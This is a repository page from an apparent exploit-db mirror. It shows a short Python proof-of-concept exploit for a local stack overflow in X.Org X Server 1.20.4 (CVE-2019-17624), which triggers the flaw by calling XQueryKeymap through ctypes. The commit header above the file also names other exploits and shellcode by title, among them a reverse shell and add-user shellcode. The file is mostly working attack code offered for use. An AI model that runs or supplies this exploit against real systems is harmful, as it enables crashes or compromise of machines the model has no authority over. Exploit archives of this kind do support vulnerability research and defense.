bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/47507.py
Offensive Security 588067072a DB: 2019-10-17 
15 changes to exploits/shellcodes

sudo 1.8.28 - Security Bypass
sudo 1.2.27 - Security Bypass
Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path
Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
X.Org X Server 1.20.4 - Local Stack Overflow
LiteManager 4.5.0 - 'romservice' Unquoted Serive Path
Solaris xscreensaver 11.4 - Privilege Escalation
Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path

Whatsapp 2.19.216 - Remote Code Execution
Accounts Accounting 7.02 - Persistent Cross-Site Scripting
CyberArk Password Vault 10.6 - Authentication Bypass

Linux/x86 -  Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
2019-10-17 05:01:44 +00:00

43 lines
No EOL
1.1 KiB
Python
Executable file
Raw Blame History

# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
# Date: 2019-10-16
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.x.org/
# Version: <= 1.20.4
# Tested on: Linux
# CVE: CVE-2019-17624
#!/usr/bin/python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) *
# ************************************************************************
import sys, time
import ctypes as ct
from ctypes import cast
from ctypes.util import find_library
def access_violation(x11, current_display):
keyboard = (ct.c_char * 1000)()
x11.XQueryKeymap(current_display, keyboard)
if __name__ == '__main__':
print "\n[*] Loading x11...\n"
time.sleep(2)
x11 = ct.cdll.LoadLibrary(find_library("X11"))
current_display = x11.XOpenDisplay(None)
print "[*] Exploiting...\n"
time.sleep(1)
try:
access_violation(x11, current_display)
except:
print "\nError...\n"
sys.exit(1)
Reference in a new issue View git blame Copy permalink